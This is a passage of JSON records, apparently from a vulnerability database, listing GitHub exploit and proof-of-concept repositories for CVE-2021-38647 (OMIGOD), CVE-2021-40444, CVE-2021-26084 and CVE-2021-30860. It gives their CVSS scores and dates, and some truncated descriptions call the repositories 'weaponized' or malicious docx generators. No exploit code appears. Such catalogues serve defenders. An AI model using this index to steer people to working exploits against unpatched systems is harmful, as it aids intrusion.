"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2023-09-28T11:31:27", "id": "8217668C-9748-5511-8C01-7E933D69F872", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T23:40:22", "description": "# CVE-2021-38647\n\nCVE-2021-38647 - POC to exploit unauthenticate...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-20T16:29:48", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-09T18:59:00", "id": "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-10T07:14:55", "description": "# Details\n## OMIGod - CVE-2021-38647\nOpen Management Infrastruct...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-19T15:43:32", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-10T05:21:40", "id": "64DFB465-6754-5E4B-B311-7668EDD4D962", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T06:18:53", "description": "# OMIGOD\nProof on Concept Exploit for CVE-2021-38647 (OMIGOD)\n\nF...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T02:11:36", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-08-17T05:00:10", "id": "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:40", "description": "# OMIGOD_cve-2021-38647\nCVE-2021-38647 is an unauthentica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T10:53:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-10-10T08:48:26", "id": "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:57", "description": "# omigood (OM I GOOD?)\n\nThis repository contains a free scanner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T15:34:03", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-13T20:33:30", "id": "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:56", "description": "# cve-2021-38647\nA PoC exploit for CVE-2021-38647 RCE in OMI.\n\nE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-16T08:33:02", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-29T12:13:38", "id": "8B4EDA16-9E27-500D-B648-9C3AD4295562", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:02", "description": "# CVE-2021-30860\nCVE-2021-30860 (FORCEDENTRY) is a known vulnera...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-18T22:14:17", "type": "githubexploit", "title": "Exploit for Integer Overflow or Wraparound in Apple Ipados", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2022-07-16T23:24:33", "id": "7C32DA80-90D8-53DB-8CDA-E29BFB69B548", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:00", "description": "# CVE-2021-38647\n\n\nThis is a POC for CVE-2021-38647 :\n\nSend a PO...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T21:44:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-19T05:39:40", "id": "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:26", "description": "# cve-2021-38647\nhttps://github.com/corelight/CVE-2021-38647 wit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T15:20:40", "type": "githubexploit", "title": "Exploit for Improper Initialization in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-22T15:29:15", "id": "610ADCD3-C281-52D4-A546-467569FE3AC1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:55", "description": "# Readme\n\nAn educational lab VM to learn about the 9.6 CVSS unau...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T15:25:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-27T11:34:25", "id": "09412330-832C-538A-A226-61474048E41B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-11T11:49:33", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "5DB14853-1EDB-5A80-BD98-BB388CC80401", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 